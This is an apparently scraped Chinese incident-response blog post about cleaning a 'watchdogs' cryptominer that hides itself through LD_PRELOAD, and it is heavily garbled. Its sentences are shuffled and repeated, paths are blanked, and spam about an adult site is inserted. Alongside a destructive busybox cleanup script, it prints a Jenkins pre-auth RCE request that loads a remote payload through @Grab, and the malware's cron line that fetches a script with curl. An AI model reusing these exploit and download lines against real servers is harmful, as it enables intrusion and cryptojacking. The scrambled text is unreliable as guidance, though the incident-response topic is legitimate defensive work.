欢迎光临!

正文

是一种常用的进程隐藏方法

Mar 14
admin 2019-03-14 07:18 可以与打赏虚拟币的黄色网站   浏览量:   次

一键清理脚本 默安科技也发了一个一键清理脚本,在此基础上,自己改了改。 首先使用了CVE--jenkins-rce-poc,但是这个漏洞是需要具有Overall/Read”权限的用户才能完成。然后想起来前两天Orange发了个PreAuth的 使用chattr加i属性来防止文件被修改,查看具有哪些属性使用lsattr POC: # wget #!/bin/sh #LANG=zh_CN.UTF-8 # 关闭crontab service crond stop systemctl stop crond # 写hosts, 屏蔽病毒脚本下载 busybox echo -e "\ \ " >> /etc/hosts # 删除,创建,并锁定 crontab相关文件 busybox rm /var/spool/cron/root && busybox touch /var/spool/cron/root && busybox chattr i  /var/spool/cron/root busybox rm /var/spool/cron/crontabs/root && busybox touch /var/spool/cron/crontabs/root && busybox chattr i /var/spool/cron/crontabs/root busybox rm /etc/ && busybox touch /etc/ && busybox chattr i /etc/ # 删除目录的其他文件 busybox rm /etc//* # 删除病毒相关执行文件和启动脚 busybox find / -type f -name '*watchdogs*'|busybox xargs rm -f # 删除病毒进程 busybox pkill watchdogs busybox pkill ksoftirqds # 删除被preload的so库 chattr -i /etc/ chattr -i /usr/local/lib/ busybox rm -f /usr/local/lib/ busybox rm -f /etc/ busybox rm -f /etc/ # 验证被卸载 # lsof |grep /usr/local/lib/ # 无输出, 则该动态链接库被卸载, 直接执行验证步骤; 有输出, kill掉占用的进程, ,重复执行该步骤; # 再次清理异常进程 busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9 busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9 # 清理异常文件 busybox rm -f /tmp/watchdogs busybox rm -f /etc//tomcat busybox rm -f /etc/ busybox rm -f /var/spool/cron/root busybox rm -f /var/spool/cron/crontabs/root busybox rm -f /etc/rc.d/init.d/watchdogs busybox rm -f /usr/sbin/watchdogs # 搜索可共享的动态链接库 ldconfig # 清理开机启动项 chkconfig watchdogs off chkconfig --del watchdogs service crond start echo "Done, Please reboot!" lsof |grep usr/local/lib/ echo $LD_PRELOAD 后来看到异常文件: Redis未授权访问or弱口令 然后被感染后受害者会尝试进行对外或内网SSH爆破、Redis探测并入侵 Jenkins RCE 漏洞 若结果为空, 则该动态链接库被卸载; 0x02 处理流程 获取busybox 为什么要获取busybox?这就是此次事件的特别之处可以与打赏虚拟币的黄色网站,如果你使用top、ps等系统命令是看不到挖矿进程的,因为挖矿病毒修改了系统的动态链接库配置文件/etc/内容并引用了/usr/local/lib/,所以有些运维人员开始top、ps等未查找到异常进程是由于该病毒涉及到 Linux动态链接库预加载机制,是一种常用的进程隐藏方法,而系统的ls,ps等命令已被通过so库的preload机制被病毒劫持, ls会导致/etc/文件被刷写为病毒定时执行命令。 剩下的几台就是Redis未授权访问导致的了,具体可以参考:未授权访问漏洞总结 busybox ls -al /etc/aily busybox ls -al /etc/   busybox ls -al /etc/  busybox ls -al /etc/ 0x03 事件总结 此次事件客户有9台服务器被感染,其中主要的一台是我们拿到信息之后发现只开放了,Nginx-80和Jenkins-8080,然后就被误导了。。。 验证被卸载 busybox pkill watchdogs busybox pkill ksoftirqds 也可以使用: busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9 busybox ps -ef | busybox grep -v grep | busybox egrep 'watchdogs' | busybox awk '{print $1}' | busybox xargs kill -9 然后想起来前两天RR大佬也爆了个Nexus的RCE,Nexus Repository Manager 3 RCE 分析 -【CVE-2019-7238】,然后试了下,成功了 busybox echo -e "\ \ " >> /etc/hosts 删除病毒进程 busybox rm -f /etc//* 关闭crontab Nexus RCE 漏洞 */15 * * * * (curl -fsSL https:///raw/sByq0rym 若有输出,kill掉占用的进程,重复执行该步骤; busybox rm /var/spool/cron/root && busybox touch /var/spool/cron/root && busybox chattr  i  /var/spool/cron/root busybox rm /var/spool/cron/crontabs/root && busybox touch /var/spool/cron/crontabs/root && busybox chattr  i /var/spool/cron/crontabs/root  busybox rm /etc/ && busybox touch /etc/ && busybox chattr  i /etc/ 检查并删除下面目录是否有异常文件 而busybox是静态编译的,不依赖于系统的动态链接库,从而不受的劫持,能够正常操作文件。 service crond stop systemctl stop crond 病毒文件 彩蛋 这次应急让我意外的是恶意的下载的sh脚本 删除被preload的so库 备份重要的crontab,然后删除目录的其他文件 删除,创建,并锁定 crontab相关文件 busybox find / -type f -name '*watchdogs*' | busybox xargs rm -f cd /bin/ wget PS: 这里跟客户学到个命令,这条命令也是可以显示恶意进程的,有兴趣的可以查查。 perf top -s pid,comm,dso,symbol 若反复执行后无法成功卸载该动态链接库,请执行服务重启操作。 Part 1: : : http:///securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true) @GrabResolver(name='payload', root='http://') @Grab(group='package', module='payload', version='1') import Payload; 修改/etc/hosts来屏蔽病毒脚本下载,域名为解密sh文件之后出现的两个域名。 删除病毒相关执行文件和启动脚本 /tmp/ksoftirqds /tmp/watchdogs 修改hosts 0x01 传播途径 此次事件从网上收集了下,途径不止有被通报的Redis, busybox rm -f /usr/local/lib/ busybox rm -f /etc/ busybox rm -f /etc/ 但是我利用这个POC是可以打成功在shodan上的,但是没办法客户的无法成功,一度相当困惑。